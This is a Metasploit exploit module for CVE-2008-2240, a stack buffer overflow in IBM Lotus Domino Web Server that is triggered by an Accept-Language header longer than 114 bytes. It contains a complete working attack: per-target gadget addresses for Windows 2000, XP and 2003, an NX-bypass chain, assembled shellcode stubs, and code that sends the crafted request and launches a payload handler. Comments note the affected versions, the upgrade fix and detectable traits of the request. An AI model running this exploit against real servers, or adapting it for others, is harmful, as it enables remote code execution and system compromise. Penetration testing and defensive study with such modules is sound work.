Path: blob/master/modules/exploits/windows/lotus/domino_http_accept_language.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Exploit module for CVE-2008-2240: a stack buffer overflow in the IBM Lotus
# Domino Web Server HTTP task, triggered by an Accept-Language request header
# longer than 114 bytes. Per the vendor advisory referenced below, versions
# prior to 7.0.3FP1 and 8.0.1 are affected; the fix is to upgrade.
#
# Each target supplies a hash of addresses keyed by name. 'FixESP' and
# 'JmpESP' are used for every target; 'FixESI', 'FixEBP', 'Ret' and
# 'DisableNX' are only read on the NX-enabled targets (see the branch on
# target['DisableNX'] in #exploit).
class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::HttpClient

  # Registers module metadata: name, description, authors, references,
  # payload constraints (800 bytes, listed bad characters) and the
  # per-target address tables.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'IBM Lotus Domino Web Server Accept-Language Stack Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in IBM Lotus Domino Web Server
        prior to version 7.0.3FP1 and 8.0.1. This flaw is triggered by any HTTP
        request with an Accept-Language header greater than 114 bytes.
      },
      'Author'         => [ 'Fairuzan Roslan <riaf[at]mysec.org>', '<Earl Marcus klks[at]mysec.org>' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2008-2240'],
          ['OSVDB', '45415'],
          ['BID', '29310'],
          ['URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg21303057'],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Privileged'     => true,
      'Payload'        =>
        {
          'Space'    => 800,
          'BadChars' => "\x00\x0a\x20\x2c\x3b",
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          # NX targets carry the full address set; the "NO NX" targets only
          # need 'FixESP' and 'JmpESP'. Addresses are specific to the listed
          # Domino build and Windows service pack.

          ['Lotus Domino 7.0 on Windows 2003 SP1 English(NX)',
            {
              'FixESP'    => 0x70335c79, # add esp, 0x324, ret @fontmanager.dll
              'FixESI'    => 0x603055da, # push esp, pop esi, ret @nnotes.dll
              'FixEBP'    => 0x60a8bc90, # push esp, pop ebp, ret 0x10 @nnotes.dll
              'Ret'       => 0x62c838c7, # ret 0x12e @nlsccstr.dll
              'DisableNX' => 0x7c83e413, # NX Disable @ntdll.dll
              'JmpESP'    => 0x62c6072e, # jmp esp @nlsccstr.dll
            }
          ],

          ['Lotus Domino 7.0 on Windows 2003 SP2 English(NX)',
            {
              'FixESP'    => 0x70335c79, # add esp, 0x324, ret @fontmanager.dll
              'FixESI'    => 0x603055da, # push esp, pop esi, ret @nnotes.dll
              'FixEBP'    => 0x60a8bc90, # push esp, pop ebp, ret 0x10 @nnotes.dll
              'Ret'       => 0x62c838c7, # ret 0x12e @nlsccstr.dll
              'DisableNX' => 0x7c83f517, # NX Disable @ntdll.dll
              'JmpESP'    => 0x62c6072e, # jmp esp @nlsccstr.dll
            }
          ],

          ['Lotus Domino 7.0 on Windows 2003/2000/XP English(NO NX)',
            {
              'FixESP'    => 0x70335c79, # add esp, 0x324, ret @fontmanager.dll
              'JmpESP'    => 0x62c6072e, # jmp esp @nlsccstr.dll
            }
          ],

          ['Lotus Domino 8.0 on Windows 2003 SP1 English(NX)',
            {
              'FixESP'    => 0x7ea0615c, # add esp, 0x324, ret @net.dll
              'FixESI'    => 0x639a7f87, # push esp, pop esi, ret @nlsccstr.dll
              'FixEBP'    => 0x6391c9f7, # push esp, pop ebp, ret 0x10 @nlsccstr.dll
              'Ret'       => 0x7f8b0628, # ret 0x12e @j9gc23.dll
              'DisableNX' => 0x7c83e413, # NX Disable @ntdll.dll
              'JmpESP'    => 0x6391071e, # jmp esp @nlsccstr.dll
            }
          ],

          ['Lotus Domino 8.0 on Windows 2003 SP2 English(NX)',
            {
              'FixESP'    => 0x7ea0615c, # add esp, 0x324, ret @net.dll
              'FixESI'    => 0x639a7f87, # push esp, pop esi, ret @nlsccstr.dll
              'FixEBP'    => 0x6391c9f7, # push esp, pop ebp, ret 0x10 @nlsccstr.dll
              'Ret'       => 0x7f8b0628, # ret 0x12e @j9gc23.dll
              'DisableNX' => 0x7c83f517, # NX Disable @ntdll.dll
              'JmpESP'    => 0x6391071e, # jmp esp @nlsccstr.dll
            }
          ],

          ['Lotus Domino 8.0 on Windows 2003/2000/XP English(NO NX)',
            {
              'FixESP'    => 0x7ea0615c, # add esp, 0x324, ret @net.dll
              'JmpESP'    => 0x6391071e, # jmp esp @nlsccstr.dll
            }
          ],

        ],
      'DisclosureDate' => '2008-05-20'))
  end

  # Builds the oversized Accept-Language value and sends a single GET request
  # to a randomly named .nsf resource.
  #
  # The header value starts as 116 random alphanumeric bytes, is patched in
  # place at fixed offsets (one layout for targets with 'DisableNX', another
  # for the "NO NX" targets), and is then followed by a NUL byte and the
  # encoded payload. The numbered trailing comments are the original
  # author's; they appear to label the order in which the patched slots are
  # consumed at runtime, but that is not verified here.
  #
  # From a detection standpoint the request is distinctive on the wire: an
  # Accept-Language header far longer than 114 bytes that contains a NUL
  # byte, a 16-character lowercase ".nsf?" URI terminated by a single
  # high-ASCII byte, and the fixed MSIE 6.0 User-Agent below.
  def exploit
    connect

    lang = rand_text_alphanumeric(116) # greetz to hateful chris
    lang[ 56, 4 ] = [ 0xfffffffe ].pack('V') # Fix Second crash (esi)
    lang[ 68, 4 ] = [ 0x7ffaf0ec ].pack('V') # Fix Second crash (eax)
    lang[ 104, 4 ] = [ 0x7ffaf030 ].pack('V') # Fix First crash
    lang[ 112, 4 ] = [target['FixESP']].pack('V') # 1
    # NUL terminates the header value as seen by the vulnerable parser; the
    # encoded payload follows it (NUL is in BadChars, so it cannot appear in
    # the payload itself).
    lang << "\x00"
    lang << payload.encoded

    # Layout selection: targets without a 'DisableNX' address use the
    # shorter non-NX sequence; NX targets use the full address set.
    if(not target['DisableNX'])
      lang[ 16, 15 ] = Metasm::Shellcode.assemble(Metasm::Ia32.new, "add esp,-0xc4 pop edi sub edi,-0x86 call edi").encode_string # 4
      lang[ 80, 4 ] = [target['JmpESP']].pack('V') # 2
      lang[ 84, 2 ] = Rex::Arch::X86.jmp_short(-0x46) # 3 jmp back to top
    else
      lang[ 16, 16 ] = Metasm::Shellcode.assemble(Metasm::Ia32.new, "add esp,-0xd8 pop edi pop edi sub edi,-0x86 call edi").encode_string # 8
      lang[ 80, 4 ] = [target['FixESI']].pack('V') # 2
      lang[ 84, 4 ] = [target['FixEBP']].pack('V') # 3
      lang[ 88, 4 ] = [target['Ret']].pack('V') # 4
      lang[ 92, 4 ] = [target['JmpESP']].pack('V') # 6
      lang[ 100, 2 ] = Rex::Arch::X86.jmp_short(-0x56) # 7 jmp back to top
      lang[ 108, 4 ] = [target['DisableNX']].pack('V') # 5
    end

    # Random .nsf resource name plus one high-ASCII byte; the Description
    # states any request with the oversized header triggers the flaw, so the
    # URI is only there to reach the vulnerable code path.
    uri = rand_text_alpha_lower(16) + '.nsf?' + rand_text_highascii(1) # Trigger

    print_status("Trying target #{target.name}...")
    # Trailing 5 is the response timeout in seconds; a successful trigger
    # crashes or hijacks the HTTP task, so no meaningful reply is expected.
    send_request_raw({
      'uri' => "#{uri}",
      'method' => 'GET',
      'headers' =>
        {
          'Accept' => '*/*',
          'Accept-Language' => "#{lang}",
          'Accept-Encoding' => 'gzip,deflate',
          'Keep-Alive' => '300',
          'Connection' => 'keep-alive',
          'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
        }
    }, 5)
    handler
    disconnect
  end
end